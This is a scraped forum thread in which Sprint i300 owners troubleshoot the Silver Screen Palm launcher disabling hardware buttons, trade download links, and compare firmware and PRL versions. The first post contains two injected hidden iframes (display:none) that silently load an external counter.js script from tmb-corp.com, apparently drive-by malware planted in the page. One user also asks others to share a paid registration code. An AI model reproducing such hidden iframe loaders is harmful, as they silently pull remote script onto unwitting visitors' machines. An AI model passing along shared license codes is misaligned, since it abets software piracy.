+ Reply to Thread
Page 1 of 2 1 2 LastLast

Question Problems with Silver Screen

Is anybody having trouble with Silver Screen? It kept making my phone and voice memo buttons stop working. I just now upgraded to the new palm desktop, and I haven't loaded it back on. Will that work, or should I trouble shoot some more. I already went through all of my third party programs one at a time, and they work fine. Ciao.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yup, SilverScreen disables buttons

I found too that Silver Screen disabled the phone-specific buttons like the Voice Memo, and phone button on the right side.

A soft reset would generally fix the problem until the next time I did a HotSync.

In the end, i decided that Silver Screen wasn't worth the trouble since i wasn't very impressed with it, so I delete it.

No problems anymore

Wink

Did it happen to you while you were using the updated palm desktop too? Also, does anybody know where I can get a copy of the new palm os? Ciao.

I had the same problems with Silve Screen. I found Handscape, and not only is it more stable, it is easier to utilize, IMO. I have attached a trial.

Craig
    Attached Files

Thanks for the trial. It seems like a much better utility. Ciao.

I had the same problem with silver screen, so i deleted it and am trying handscape. It looks great, and was working great until i tried to re-arrange the category folders. It locked up on me completely and i had to do a hard reset. Anyone have this problem?

Thumbs down Silver Screen 2.4 doesn't work either

Just to let everyone know...Silver Screen 2.4 does not work yet with the I300. The program still disables the phone and voice memo buttons on the side. I am going to e-mail silver screen tech support to let them know.

www.pocketsensei.com (Silver screen web site)

I had the problem but I have Silver Screen working fine now been about two weeks no problem. I think it is one of two things I did can't remember as I was loading a number of apps when that problem was happening.

When you HotSync turn phone off when done then turn phone on or it was after a soft reset then it works fine. When I get time I'll HS again and post my results.

Thumbs up Silver Screen 2.51 working with I-300

Greetings,

This evening I decided to call Claire which she tranfered me to a Sprint tech. He, then flaged my I-300 for the latest software and firmware upgrade. I then decided to download Silver Screen 2.51, as the Sprint tech told me that he was using it. So, I installed it with several themes and fonts. I spent the last 3 hours playing with all the features and apps that I use on my I-300 and they all seem to work fine. This was not the case with Silver Screen 2.5.

I tought I would post this just in case someone may want to try it. Also, I would make sure that your I-300 use the latest software and firmware as I had to upgrade both.

My simple 2 cents.

fbg
    What is the latest firmware version for the SPH-i300?

Unhappy

where did you download silver screen 2.51?

I can only find 2.5 for download.

Thank You

Did you tried after a hotsync to press the phone button, did it work?. I have Silverscreen 2.5 and the only problem that I have is that. Of course you reset the phone,a and then everything works fine.

Let me tell you, this Silverscreen and the Jake's Graffiti hack makes my phone looks sweet!!
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Yorch,

I had the same problem as you with silverscreen for quite some time -- until two days ago when I installed the digiboy collection and documents to go at the same time. Since then, I don't have to do a reset, the phone button works?!?! I'm going to look into this more and see what exactly made it work. I'll let you know if I figure it out....

Here is so more info:

http://www.maxflashstudio.com/files/silver251.zip
    After install, go to Silver menu, option, and about Silver Screen,
    then you 2.51 wait 2 seconds, then the versiion shows up.

Also, yes I tried severals HotSync and the phone button works just fine.

This is the latest in my i-300

S/W Version
    S:i300.0.1suj12
    (pda:0110:1200)
    p:sprl 10014

H/W Version
    h:i300.03.5.qo

I am running also Jake's Graffiti with Siver Screen 2.51.

Well, I hope this helps a bit.

yannco

WOOOHOOOO!!!! It works!!....THANKS A LOT!!

Damn.....this thing keeps getting better!
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Wink

works without a glitch.

All hard buttons function properly.

Can anyone with a vibrablinkhack registration code give it to me. I can't seem to get in touch with the guys who created it.

Thanks

I tried...

I tried to get someone to upgrade my software/firmware over the phone. She said "sure" and 30 seconds later said she was done. It seemed a little short to me so I asked what she did and she said she upgraded it, I asked what version and she said "seven". It didn't seem right so I'm calling agian and trying to get someone else...

Any thoughts?
    Gary

I tried (part 2)

So I got a different person this time when calling back. Clair didn't like "firmware update" so I tried "PRL update" and got a person who answered "tech support" (the woman from before didn't say that). He said I had to go to a sprint store for a firmware/software update but he could do a PRL (Preferred Roaming List) update for me (I had to hang up call *2 and Clair did it with no prompting from me).

For chuckles I asked him the latest software version (he said S.I300.01.SUj12) and the latest PRL list (he said 10014). But when I got the PRL it said it was version 10015.

So what's the verdict? Can I get software/firmware over the phone or not?

Gary

(In case you're wondering you can find the version(s) on your phone by going into the phone, hit the menu button, hit "options" and pick "version")

Yep, I called Sprint again, to check the the latest SPRL, and it's funny, cause the tech said that the latest SPRL is 10014 which is the version that I have, so I told him to flag my phone, and I'll be damn, when checking the version it does show 10015.

Sprint should at least update their databases, so the tech can provide the correct info.

On the the other side, I told the tech that my phone echo most of the time and he acknowledged that they have some tuning to do with the i300. Anyway, he made the change, and the echo is gone.

yannco

Administrator

Arrow

the only thing you can get OTA is the prl updates... any firmware/software stuff you will need to get at a sprint store capable of the update...

the 10015 is the latest but it may not be in all areas OTA, so until its in place everywhere, they will then bring the reps up to date..

i believe prl 10015 allows you access in alaska without roaming..